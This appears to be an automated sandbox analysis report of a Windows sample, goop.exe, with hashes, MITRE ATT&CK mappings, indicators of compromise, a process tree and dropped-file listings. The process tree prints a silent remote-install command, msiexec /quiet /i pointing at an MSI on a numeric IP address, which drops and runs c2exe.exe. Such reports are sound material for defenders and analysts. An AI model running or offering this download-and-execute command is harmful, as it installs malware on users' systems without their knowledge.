cf8047d4cc968984abac31c651812624f934d6a0a246e13aa6439efc15a76437

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29/05/2024, 05:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

goop.exe
Size

26KB
MD5

c731fe3c96d4c99b5e0bbfbf0beddcbd
SHA1

1755196df713731e92da7aef8039f958600966d1
SHA256

cf8047d4cc968984abac31c651812624f934d6a0a246e13aa6439efc15a76437
SHA512

72d2cb9d130266b4baa95ac907b578d51fc6d9b8c085fdded861d34933c9a4361e73ca4820e849d34099ad67468899e2e3a37a09bc93b07dab194f0c213d4c7e
SSDEEP

768:sEHP8yBrsBn3HQVOaqM41v1XbV9egm3Hrdd:sEHP8yBrsyIrTXeX3X

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3968	c2exe.exe

Loads dropped DLL 1 IoCs

pid	Process
2104	MsiExec.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1572	ICACLS.EXE

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
4948	msiexec.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
11	2816	msiexec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5082.tmp	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File opened for modification	C:\Windows\Installer\MSI4DA3.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3456	goop.exe
3456	goop.exe
2816	msiexec.exe
2816	msiexec.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	3456	goop.exe
Token: SeShutdownPrivilege	4948	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4948	msiexec.exe
Token: SeSecurityPrivilege	2816	msiexec.exe
Token: SeCreateTokenPrivilege	4948	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4948	msiexec.exe
Token: SeLockMemoryPrivilege	4948	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4948	msiexec.exe
Token: SeMachineAccountPrivilege	4948	msiexec.exe
Token: SeTcbPrivilege	4948	msiexec.exe
Token: SeSecurityPrivilege	4948	msiexec.exe
Token: SeTakeOwnershipPrivilege	4948	msiexec.exe
Token: SeLoadDriverPrivilege	4948	msiexec.exe
Token: SeSystemProfilePrivilege	4948	msiexec.exe
Token: SeSystemtimePrivilege	4948	msiexec.exe
Token: SeProfSingleProcessPrivilege	4948	msiexec.exe
Token: SeIncBasePriorityPrivilege	4948	msiexec.exe
Token: SeCreatePagefilePrivilege	4948	msiexec.exe
Token: SeCreatePermanentPrivilege	4948	msiexec.exe
Token: SeBackupPrivilege	4948	msiexec.exe
Token: SeRestorePrivilege	4948	msiexec.exe
Token: SeShutdownPrivilege	4948	msiexec.exe
Token: SeDebugPrivilege	4948	msiexec.exe
Token: SeAuditPrivilege	4948	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4948	msiexec.exe
Token: SeChangeNotifyPrivilege	4948	msiexec.exe
Token: SeRemoteShutdownPrivilege	4948	msiexec.exe
Token: SeUndockPrivilege	4948	msiexec.exe
Token: SeSyncAgentPrivilege	4948	msiexec.exe
Token: SeEnableDelegationPrivilege	4948	msiexec.exe
Token: SeManageVolumePrivilege	4948	msiexec.exe
Token: SeImpersonatePrivilege	4948	msiexec.exe
Token: SeCreateGlobalPrivilege	4948	msiexec.exe
Token: SeRestorePrivilege	2816	msiexec.exe
Token: SeTakeOwnershipPrivilege	2816	msiexec.exe
Token: SeRestorePrivilege	2816	msiexec.exe
Token: SeTakeOwnershipPrivilege	2816	msiexec.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 3456 wrote to memory of 4948	3456	goop.exe	85
PID 3456 wrote to memory of 4948	3456	goop.exe	85
PID 2816 wrote to memory of 2104	2816	msiexec.exe	90
PID 2816 wrote to memory of 2104	2816	msiexec.exe	90
PID 2816 wrote to memory of 2104	2816	msiexec.exe	90
PID 2104 wrote to memory of 1572	2104	MsiExec.exe	93
PID 2104 wrote to memory of 1572	2104	MsiExec.exe	93
PID 2104 wrote to memory of 1572	2104	MsiExec.exe	93
PID 2104 wrote to memory of 3956	2104	MsiExec.exe	95
PID 2104 wrote to memory of 3956	2104	MsiExec.exe	95
PID 2104 wrote to memory of 3956	2104	MsiExec.exe	95
PID 2104 wrote to memory of 3968	2104	MsiExec.exe	97
PID 2104 wrote to memory of 3968	2104	MsiExec.exe	97

C:\Users\Admin\AppData\Local\Temp\goop.exe
"C:\Users\Admin\AppData\Local\Temp\goop.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456
- C:\Windows\system32\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /quiet /i http://3.141.55.131:8000/c2exe.msi
  2⤵
  - Use of msiexec (install) with remote resource
  - Suspicious use of AdjustPrivilegeToken
  PID:4948

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8B7B4AFA4A92417B92ECB1421A98256B
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2104
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
    3⤵
    - Modifies file permissions
    PID:1572
- - C:\Windows\SysWOW64\EXPAND.EXE
    "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
    3⤵
    - Drops file in Windows directory
    PID:3956
- - C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\files\c2exe.exe
    "C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\files\c2exe.exe"
    3⤵
    - Executes dropped EXE
    PID:3968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\files.cab

Filesize
6KB

MD5
f48a85de44fbab2c246fae7ac3c2e079

SHA1
6ae186f30e2d1ffbda51daf5385dd5323daaf8b0

SHA256
433894591dde3ef00e6b59f13c5106574d2920c5bde0c82567331305b2607127

SHA512
4adf930db3f3eeb81132a0223c80bd7c066c279258aeeed88e300d38b3e8cdf1db9d643c9a60ae164a4b6e1892e6a389b0efcd3cccbb2c93b9bf0d061207dee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\files\c2exe.exe

Filesize
6KB

MD5
2f4531484ff7ac43f50304a421d52d8a

SHA1
237404f24027658f4b7c4b59f4b6342b7694d141

SHA256
1ef99f635530b86c85c4d3a3e2bd382e9ca61ac6b23ef1bfaf141933107aad89

SHA512
967b93e18ef39d2138d8123e110bbb61114fbf7238eff53d9888c527dbdddd1e643224942dfd29d9a8448ffb857f5c4a2319118d05dcdbb656d1556968c930d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\msiwrapper.ini

Filesize
1KB

MD5
35730a1e5641cc7624e53845f46d6ede

SHA1
c29d25d636be62c2a982e8b56225471032ad868b

SHA256
4a941b25cfddf4d6e1fee304e92a3aee3e32a75a398b76db75440cdd7a9f395a

SHA512
69ce6b41a7d964c0f63e4aa4bb473b17d1b14e5263dd1f0083cea324ffa90931e4aace3cd4eb0b0d6d0f04868d852130b290948c56cb25b3c7c01b131f20051f

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\msiwrapper.ini

Filesize
1KB

MD5
2a24253a52cc209cac8463fe426e0829

SHA1
20da59105674d0fbfbd1c38823e5270f7252d3e2

SHA256
1cbaea13a301b25afe133622464351993354a5bc9885990e90c723cf3464ce03

SHA512
038f12bd781a6d9722eca4b070c16ee161241dc06e17c7368248190d4c735d151b36f020c53307235dce08e4b3c0e06ae6727a9b2be4b0cfa4d8d5ffbee62665

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pcy4yuun.2id.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Installer\MSI4DA3.tmp

Filesize
252KB

MD5
d457ede045732a5c1e1895304d1dc560

SHA1
658c7ccbb5164044da088f5c3e447de059571e20

SHA256
2cf84ed623f2680e8162d7499b9bdab785dad88bfb6fc012717f53c8dfae3dde

SHA512
6da954934dcbabda052ffe6324880145e8e5334a077d1be0e865f6679e0abd6e207712d37f1f6ce6b79073d18dacaa60d56cc5bf534fe8f66138a29e8fba2f4c

Download Submit
C:\Windows\Installer\MSI5082.tmp

Filesize
208KB

MD5
0c8921bbcc37c6efd34faf44cf3b0cb5

SHA1
dcfa71246157edcd09eecaf9d4c5e360b24b3e49

SHA256
fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

SHA512
ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

Download Submit
memory/3456-0-0x00007FFA75253000-0x00007FFA75255000-memory.dmp

Filesize
8KB

Download
memory/3456-14-0x00007FFA75250000-0x00007FFA75D11000-memory.dmp

Filesize
10.8MB

Download
memory/3456-12-0x00007FFA75250000-0x00007FFA75D11000-memory.dmp

Filesize
10.8MB

Download
memory/3456-11-0x000000001B390000-0x000000001B3B2000-memory.dmp

Filesize
136KB

Download
memory/3456-1-0x0000000000830000-0x000000000083C000-memory.dmp

Filesize
48KB

Download
memory/3968-84-0x0000000000190000-0x0000000000198000-memory.dmp

Filesize
32KB

Download